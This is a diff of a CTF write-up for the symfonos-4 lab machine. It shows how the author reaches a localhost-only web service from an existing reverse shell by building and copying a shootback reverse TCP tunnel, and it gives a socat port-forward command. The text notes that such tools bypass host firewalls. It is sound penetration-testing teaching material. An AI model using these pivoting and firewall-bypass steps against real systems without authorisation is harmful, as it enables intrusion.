KazWolfe/blog.wolf.dev/Security/CTFs/symfonos-4/writeup.md

     tcp     LISTEN   0        128                    *:80                  *:*
     tcp     LISTEN   0        128                 [::]:22               [::]:*

 A webserver on 8080!
 Interesting.
-This didn't show up on our Nmap scan, so there's a firewall on this machine.
-It's there, it's annoying, and we can't do anything about it.
+This didn't show up on our Nmap scan, as it's binding to localhost.
+Therefore, we can't really connect to it (much like MySQL as well) nor can we modify the bind configs as that's controlled in a file owned by `root`.

 Except... we can.
 For this CTF, I opted to use [`shootback`](https://github.com/aploium/shootback), and open source and (pretty) friendly reverse TCP tunnel.
+Tools like this would bypass any firewalls on the host system (in this case, there weren't any, but we aren't always as lucky).
+Other tools like [`socat`](https://linux.die.net/man/1/socat) could have been used as well (e.g. `socat TCP-LISTEN:8001,fork,reuseaddr tcp:127.0.0.1:8080 &`), which would have probably simplified the below steps.
+Use whichever you like more.

 We'll clone the repo to our Kali machine, build the slaver, and get that ready to be copied over:

-    root@kali:/tmp/sym4# git clone https://github.com/aploium/shootback.git
+    root@kali /tmp/sym4 # git clone https://github.com/aploium/shootback.git
     Cloning into 'shootback'...
     < ... >
     Resolving deltas: 100% (161/161), done.
-    root@kali:/tmp/sym4# cd shootback
+    root@kali /tmp/sym4 # cd shootback
-    root@kali:/tmp/sym4/shootback# python3 ./build_singlefile_slaver.py
+    root@kali /tmp/sym4/shootback # python3 ./build_singlefile_slaver.py
     generate complete!
     output file: /tmp/sym4/shootback/slaver_singlefile.py
-    root@kali:/tmp/sym4/shootback# mv slaver_singlefile.py ../slaver.py
+    root@kali /tmp/sym4/shootback # mv slaver_singlefile.py ../slaver.py

 Our HTTP server is still running, so let's copy that over.
 On our reverse shell: